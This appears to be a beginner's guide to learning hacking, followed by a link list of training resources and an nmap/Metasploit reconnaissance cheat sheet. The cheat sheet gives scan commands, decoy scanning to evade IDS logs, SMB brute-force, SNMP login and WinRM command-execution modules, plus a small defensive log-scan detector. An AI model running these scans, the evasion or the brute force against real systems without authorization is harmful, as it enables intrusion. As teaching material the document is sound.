As long as you have a vague idea of how to use a computer you’re at a starting point you can work with. Yes, if you don’t have a solid understanding of how TCP works you should put it on your to-do list to look up when someone is talking about it in a hacking tutorial – but it’s ridiculous to think you need a ton of prerequisite knowledge before you’re allowed to start learning about topics you’re interested in. When you’re looking up how that login puzzle works on a hacking site and it uses JavaScript, you’re going to learn how JavaScript works. When you read through how a buffer overflow works and it has a Python template, you’ll learn some basics of Python. No, you won’t get a job as a developer in those languages at the end of it, but you’ll pick up the common ways to break the language.

Informal Learning
“Ok, I get the hint – I need to learn things myself, but can you at least give me a starting point?”

Sure, there are a ton of great free or cheap resources out there to get started depending on what topic appeals to you. Here are some examples.

Web Application Security

  • HackThisSite – Good for some basic web based challenges (link)
  • Enigma Group – Similar to Hack this site (link)
  • Hack The Box – A massive, online cybersecurity training platform (link)
  • OWASP Top 10 – Idea of what are the most common vulnerabilities (link)
  • TryHackMe – a free online platform for learning cyber security (link)
  • OWASP Broken Web Apps – A virtual machine you can load up to practice hacking skills on your own network (link)
  • Pentesting Lab – Another web focused virtual machine (link)
  • In fact anything from VulnHub that interests you is good (link)
  • The Web Application Hacker’s Handbook – The book on web hacking and vulnerabilities (link)


Reverse Engineering / Malware Reversing

  • Lena’s Tutorials – Known as pretty much one of the best introductions to reverse engineering (link)
  • The Legends of Random – Again another solid set of tutorials for reverse engineering (link)
  • Reversing: Secrets of Reverse Engineering – A good book on the foundations of reverse engineering (link)
  • Practical Malware Analysis – A great book focusing on reversing malware (link)
  • Malware Analyst’s Cookbook – Another book focusing on reversing malware (link)


Network Security

  • Virtual Machines dominate this category as they allow you to practice against real machines. Head to vulnhub and download any VM that looks interesting (link)
  • Metasploit Unleashed – A solid run-through of the Metasploit testing framework, to be used in conjunction with VMs (link)
  • The Basics of Hacking and Penetration Testing – A very basic look at penetration testing useful for those completely new to the field. (link)
  • Metasploit – The Penetration Testers Guide – Another book focusing around the use of metasploit in penetration testing (link)
  • Because this is such a huge field, it’s often best to break it down into one aspect, then research that aspect specifically. Blogs are your best friend here. (link)


Exploit Development

  • Corelan – This is by far the best resource out there for learning about exploit development. (link)
  • FuzzySecurity – Another good learning resource with some tutorials available (link)
  • Exploit-DB – One of the best things you can do is find examples of exploits (often with apps attached) and try and replicate the exploit independently (link)
  • Hacking – The Art of Exploitation – A fantastic book that covers tons of different exploitation techniques (link)
  • The Shellcoder’s Handbook – Another fantastic book on exploit development and shellcoding (link)

Other than that, Google, Google, and some more Google. I’ve left off some areas such as forensics and compliance because personally I’m not interested in them, so I haven’t gone looking for resources; I’m sure there are some fantastic ones out there.

Formal Learning
Outside of the free resources you can also begin to get certificates to make yourself more appealing to employers if you wish to transition into the field as more of a career path. One certification I’d highly recommend is the “Penetration Testing with Kali Linux” course from Offensive Security (link) if you’re interested in network security. It’s easily one of the best learning experiences I’ve ever had in the field and taught me more in 60 days than I’d learnt in a year on my own. Their “Cracking the Perimeter” is also a great course, focusing a little more on exploit development (link).

If you’re looking at developing your programming skills, something like SecurityTube’s “Python for Pentesters and Hackers” (link) is a great foundation that will teach you how to do plenty of nifty things like building your own port scanners, password crackers etc. I don’t place a huge value on the certifications they offer from an employment perspective, but I’d look at it more as a consolidated lump of knowledge and examples for sale, which can still be valuable.

The “Certified Ethical Hacker” course is another commonly mentioned one. Honestly, it’s typically looked down upon so I don’t think it’s necessarily worth the money – but if you need a formal course to learn things then it might be worth the money to you. A lot of these certifications and their value are discussed over at TheEthicalHacker.net’s forums, located here.

“Just seeing if you can”
Hacking is all about gaining access to things that we’re not meant to. Creating an exploit, finding a SQL injection, password cracking: it’s all designed to move us towards the goal of taking control of the box we’re attacking. I guarantee almost every new hacker has started dreaming about “just seeing if they can” get access to that school website. “Just seeing if they can” gain access to the neighbor’s WiFi network. Sending their friend a trojan “just to see if they can” take control. Worse still, you might end up visiting places like HackForums.net and seeing a lot of people trying to infect others with RATs, build botnets etc. under the impression this is hacking, or sadly that this is the only way you can learn.

I need to emphasize that this is not the case. Any type of “just seeing if you can” type exercises can be replicated through the use of virtual machines, your own routers or even capture the flag / wargame competitions out there. Being realistic even if you can access another person’s machine, what are you going to do with it? Are you really going to try and steal credit card details and make fraudulent transactions? Are you really going to steal passwords and be paranoid that your activity is going to be traced back to you for the sake of peeking at someone’s emails? There have been plenty of examples of newbies being charged, not realizing the seriousness of the crimes they are committing. If you went for a job with the FBI and they had a look through your post history would you like them to read that post about you asking how to host a botnet? It’s a classic example of what’s on the internet is forever, and if you really want a career in information security you need that clean record to obtain any security clearances you’re going to need to do your job. Getting caught for stupid stuff just isn’t worth it.

So after a long ramble, what are the key points?

  • A hacker will actively seek out information, not wait for others to give it to him
  • The difference between a script kiddie and a new hacker is the desire to learn
  • You need to experiment with a wide range of information security fields to find what interests you
  • Don’t let anyone tell you that there are prerequisites for learning information security; there aren’t.
  • It’s not worth “just seeing if you can” do anything that isn’t legal, the risk vs reward makes no sense for doing so
  • With courses, wargames, capture the flags and more importantly virtual machines there is no hacking scenario that can’t be replicated legally

Have fun, sorry if it got preachy towards the end and enjoy pwning boxes! Information security is an awesome field and you’ll be learning something new every day that you’re involved in it. There is no right answer for getting into the field apart from jumping into it with both feet. Get wet, learn to tread water and stay afloat, one day you might even be able to swim a little!

Find me on twitter @jimmwayans


Information/Cyber Security Cheat Sheet


This is a collection of links and resources I have found or been told about over the years. I developed this post in the hope of mapping out good resources in the industry, facilitating the spread of knowledge, no matter the skill level.

If any errors are spotted, or any links need adding, updating or removing, please contact me via Twitter @jimmwayans (https://twitter.com/jimmwayans).

CTF Site Links

The King Of CTF Pages – https://ctftime.org/
247CTF – https://247ctf.com
HackTheBox – https://hackthebox.eu/
RootMe – https://root-me.org/
0x0539 – https://0x0539.net/
Laptop Hacking Coffee – https://ctf.laptophackingcoffee.org/
pwnable tw – http://pwnable.tw/ (Only BinExp)
pwnable kr – http://pwnable.kr/ (Only BinExp)
PicoCTF – https://picoctf.com/ (Beginner friendly)
reversing kr – http://reversing.kr/
The Stereotyped Challenges – https://chall.stypr.com/
SDSLabs CTF – https://backdoor.sdslabs.co/

Payload Cheat Sheets

PayloadsAllTheThings – https://github.com/swisskyrepo/PayloadsAllTheThings
BurpSuite XSS Cheat Sheet – https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

OSCP Preparation

Sam’s Review / Guide – https://coffeejunkie.me/OSCP-Exam-Overview/
R4J Buffer Overflow – https://github.com/r4j0x00/oscp-like-stack-buffer-overflow
Computerphile BoF Explanation – https://www.youtube.com/watch?v=1S0aBV-Waeo
g0tm1lk Linux Priv Esc Cheat Sheet – https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Windows Priv Esc – https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows Priv Esc (built around OSCP) – https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

SAST Practice Pages

Secure Code Warrior – https://securecodewarrior.com/
ExploitDB (May require imagination) – https://www.exploit-db.com/

All Around Practical Learning (non-competitive)

OWASP Juice Shop – https://owasp.org/www-project-juice-shop/
Pentester Labs – https://pentesterlab.com/
OverTheWire – https://overthewire.org/ (Beginner friendly)
Pentester Academy – https://www.pentesteracademy.com/
PortSwigger Labs – https://portswigger.net/web-security
CTFLearn – http://ctflearn.com/
VulnHub – http://vulnhub.com/
Hacker101 – https://www.hacker101.com/
OSINTme – https://osintme.com/

All Around Theory Learning (non-competitive)

OWASP – https://owasp.org/
BurpSuite Research – https://portswigger.net/research
HumbleBundle Cyber Security Books – https://www.humblebundle.com/books/cybersecurity-2020-wiley-books?hmb_source=navbar&hmb_medium=product_tile&hmb_campaign=tile_index_4
Free SANS courses for the fundamentals – https://www.cyberaces.org/courses.html

Relevant Blogs / Podcasts

Security Weekly – https://securityweekly.com/category-shows/application-security-weekly/
Darknet Diaries – https://darknetdiaries.com/
TheManyHatsClub – https://themanyhats.club/
0x00Sec (Community Blog) – https://0x00sec.org/
Secret Club – https://secret.club/
g0tm1lk – https://blog.g0tmi1k.com/
Cybering – https://cybering.cc/

Twitch Hacking Channels (English)

TheBlindHacker – https://www.twitch.tv/theblindhacker
GeoHotz – https://www.twitch.tv/georgehotz
LiveOverflow – https://www.twitch.tv/LiveOverflow

Twitch Hacking Channels (Spanish)

S4vitar – https://www.twitch.tv/s4vitaar

Youtube Channels Pentesting (English)

HackerSploit – https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q
IppSec – https://youtube.com/ippsec
TheCyberMentor – https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw
LiveOverflow – https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
Computerphile – https://www.youtube.com/user/Computerphile

Relevant Discord Servers and Communities

TheManyHatsClub – https://discord.gg/infosec
ThugCrowd – https://thugcrowd.com/
LaptopHackingCoffee – https://laptophackingcoffee.org/doku.php?id=start
HackTheBox – https://discord.gg/hRXnCFA
0x00Sec – https://discord.gg/PHM9Wak (https://0x00sec.org)
John Hammond Discord – https://discord.gg/Kgtnfw4
ReSwitched – https://discordapp.com/invite/ZdqEhed
ur-hackr – https://ur-hackr.com/

Companies Offering Certificates

ELearnSecurity – https://elearnsecurity.com/
Pentester Academy – https://www.pentesteracademy.com/
Offensive Security – https://www.offensive-security.com/
HackTheBox – https://hackthebox.eu/

The Cybrary – https://www.cybrary.it/
CyberFirst – https://www.ncsc.gov.uk/cyberfirst/
Mind Map Everything – https://www.amanhardikar.com/mindmaps.html
Events around London – https://medium.com/@securestep9/cybersecurity-infosec-appsec-meetups-events-in-london-3688c4a42ea6
Razvi’s List of Hacking Sites – https://razvioverflow.github.io/starthacking
Peerlyst – https://www.peerlyst.com/
CTFs for beginners – https://twitter.com/JenF3rr_/status/1208577793359003648
HackerOne Bugbounty page – https://hackerone.com/
Using Twitter for InfoSec – https://dev.to/vickilanger/that-s-it-that-s-the-tweet-send-3e0h
CVE feed from MITRE – https://cve.mitre.org/

nmap scanning

Active Information Gathering with Metasploit-Framework

Using Nmap to perform port scanning

The -sT (TCP connect) scan mode is Nmap’s default when it runs without raw-packet privileges. The state of each target port is judged accurately because a full TCP three-way handshake is performed, but because the connection is fully established it is very easy for the target’s firewall to log it.

msf> nmap -sT <target>

The -sS scan mode does not complete the three-way handshake; it is called a half-open scan, also known as a stealth scan. Compared to the TCP connect scan it is faster and less likely to be logged.

msf> nmap -sS <target>

The -sU scan mode is the fastest scan method, because UDP simply sends and receives without a handshake, but its results may differ somewhat from those of the two TCP scan methods above.

msf> nmap -sU <target>

Operating system identification
Nmap can identify the target operating system in two ways:

1. The commonly used -O parameter is an advanced Nmap option for OS detection and is usually used on its own.

msf> nmap -O <target>

2. The -sV parameter can be combined with the port scan parameters above; Nmap then appends the identified service and version information for each open port to the scan result.

msf> nmap -sSV <target>

Nmap security scan

Usually a scan against a target site or host is recorded by the WAF or IDS, which exposes the tester, so hiding the tester’s IP information during intrusive or deceptive scans is necessary. Nmap provides the advanced -D (decoy) parameter for this: if you supply 2 decoy IP addresses, the WAF log will show 3 source addresses, obscuring which one is the tester’s.

msf> nmap -sS -D <decoy1>,<decoy2> <target>
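The scan modes above (a full-connect -sT, a half-open -sS and -D decoys) each leave a distinct footprint in the target’s firewall logs, which is what a defender keys on. As an added example, not from the original post, here is a small Python detector run over constructed log lines in a simplified iptables-like layout (an assumption of this example; real vendor formats differ): it labels connect scans and SYN scans and clusters sources that probe in lockstep the way -D decoys do.

```python
import re
from collections import defaultdict

# Constructed sample firewall log in a simplified iptables-like layout (assumed for this
# example; real formats differ). 10.0.0.5 runs a full-connect scan (-sT, SYN then ACK);
# 10.0.0.7/.8/.9 are a SYN scan (-sS) with two -D decoys, so three addresses probe in
# lockstep and only SYNs appear; 10.0.0.20 is an ordinary client talking to one port.
SAMPLE_LOG = """\
1700000000.000 SRC=10.0.0.5 DPT=22 FLAGS=S
1700000000.002 SRC=10.0.0.5 DPT=22 FLAGS=A
1700000000.010 SRC=10.0.0.5 DPT=80 FLAGS=S
1700000000.012 SRC=10.0.0.5 DPT=80 FLAGS=A
1700000000.020 SRC=10.0.0.5 DPT=445 FLAGS=S
1700000000.022 SRC=10.0.0.5 DPT=445 FLAGS=A
1700000005.000 SRC=10.0.0.7 DPT=22 FLAGS=S
1700000005.001 SRC=10.0.0.8 DPT=22 FLAGS=S
1700000005.002 SRC=10.0.0.9 DPT=22 FLAGS=S
1700000005.010 SRC=10.0.0.7 DPT=80 FLAGS=S
1700000005.011 SRC=10.0.0.8 DPT=80 FLAGS=S
1700000005.012 SRC=10.0.0.9 DPT=80 FLAGS=S
1700000005.020 SRC=10.0.0.7 DPT=445 FLAGS=S
1700000005.021 SRC=10.0.0.8 DPT=445 FLAGS=S
1700000005.022 SRC=10.0.0.9 DPT=445 FLAGS=S
1700000009.000 SRC=10.0.0.20 DPT=443 FLAGS=S
1700000009.002 SRC=10.0.0.20 DPT=443 FLAGS=A
"""
LINE_RE = re.compile(r"^(\d+\.\d+) SRC=([\d.]+) DPT=(\d+) FLAGS=([A-Z]+)$")


def parse_log(text):
    """Return (ts, src, dport, flags) tuples, skipping lines that do not match."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((float(m[1]), m[2], int(m[3]), m[4]))
    return events


def classify_sources(events, min_ports=3, window=10.0):
    """Label sources that SYN to >= min_ports distinct ports within `window` seconds:
    'connect-scan' (-sT) if the source also sent ACKs, i.e. it finished handshakes;
    'syn-scan' (-sS) if only SYNs were seen, i.e. half-open probes never completed."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    verdicts = {}
    for src, evs in by_src.items():
        syns = sorted(e for e in evs if e[3] == "S")
        for i, (t0, _, _, _) in enumerate(syns):  # slide a window over the SYNs
            ports = {e[2] for e in syns[i:] if e[0] - t0 <= window}
            if len(ports) >= min_ports:
                acked = any("A" in e[3] for e in evs)
                verdicts[src] = "connect-scan" if acked else "syn-scan"
                break
    return verdicts


def find_decoy_groups(events, verdicts, max_skew=0.1):
    """Cluster flagged sources whose first SYN to each port lands within `max_skew` seconds
    of one another: the lockstep footprint nmap -D leaves. The log cannot say which is real."""
    first_syn = defaultdict(dict)  # src -> {dport: time of first SYN}
    for ts, src, dport, flags in events:
        if src in verdicts and flags == "S":
            first_syn[src].setdefault(dport, ts)

    def lockstep(a, b):
        return first_syn[a].keys() == first_syn[b].keys() and all(
            abs(first_syn[a][p] - first_syn[b][p]) <= max_skew for p in first_syn[a])

    groups, seen = [], set()
    for a in first_syn:
        if a not in seen:
            group = {b for b in first_syn if b == a or lockstep(a, b)}
            seen |= group
            if len(group) > 1:
                groups.append(sorted(group))
    return groups


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    labels = classify_sources(evs)
    print(labels)
    print("possible -D decoy groups (real scanner unknown):", find_decoy_groups(evs, labels))
```

The thresholds (three ports in ten seconds, 100 ms skew) are tuned to the constructed sample; on real logs they need to be set against the normal traffic of the monitored host.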

1. TCP port scan

msf> use auxiliary/scanner/portscan/tcp 

2. SYN port scan

msf> use auxiliary/scanner/portscan/syn

3. Call nmap

In metasploit-framework use db_nmap to do a complete banner grabbing, use the following command:

msf> db_nmap -Pn -sTV -T4 --open --min-parallelism 64 --version-all -p - <target>

The -Pn parameter tells Nmap that the target has already been determined to be online, so the host discovery step is skipped. -sTV means a TCP connect scan that also grabs the banner and version of each port. -T4 selects the aggressive timing template and --open lists only the ports found open. The --min-parallelism parameter runs at least 64 probes in parallel, --version-all makes Nmap use every version probe to identify service details, and -p - tells it to scan all ports of the target.

4. Use ARP for live host scanning

msf> use auxiliary/scanner/discovery/arp_sweep
msf> set RHOSTS <target-range>
msf> set THREADS 10
msf> run

5. Use UDP to detect live hosts

msf> use auxiliary/scanner/discovery/udp_sweep
msf> set RHOSTS <target-range>
msf> set THREADS 10
msf> run

6. Use SMB to detect live hosts

msf> use auxiliary/scanner/smb/smb_enumshares
msf> set RHOSTS <target-range>
msf> set THREADS 10
msf> run

7. SMB version scan

msf> use auxiliary/scanner/smb/smb_version 

8. SMB brute force (dictionary required)

msf> use auxiliary/scanner/smb/smb_login

9. SSH version scan

msf> use auxiliary/scanner/ssh/ssh_version

10. FTP version scan

msf> use auxiliary/scanner/ftp/ftp_version

11. SMTP enumeration

msf> use auxiliary/scanner/smtp/smtp_enum

12. SNMP enumeration

msf> use auxiliary/scanner/snmp/snmp_enum

13. SNMP login

msf> use auxiliary/scanner/snmp/snmp_login

14. WinRM scan

msf> use auxiliary/scanner/winrm/winrm_auth_methods

15. WinRM command execution (authenticated)

msf> use auxiliary/scanner/winrm/winrm_cmd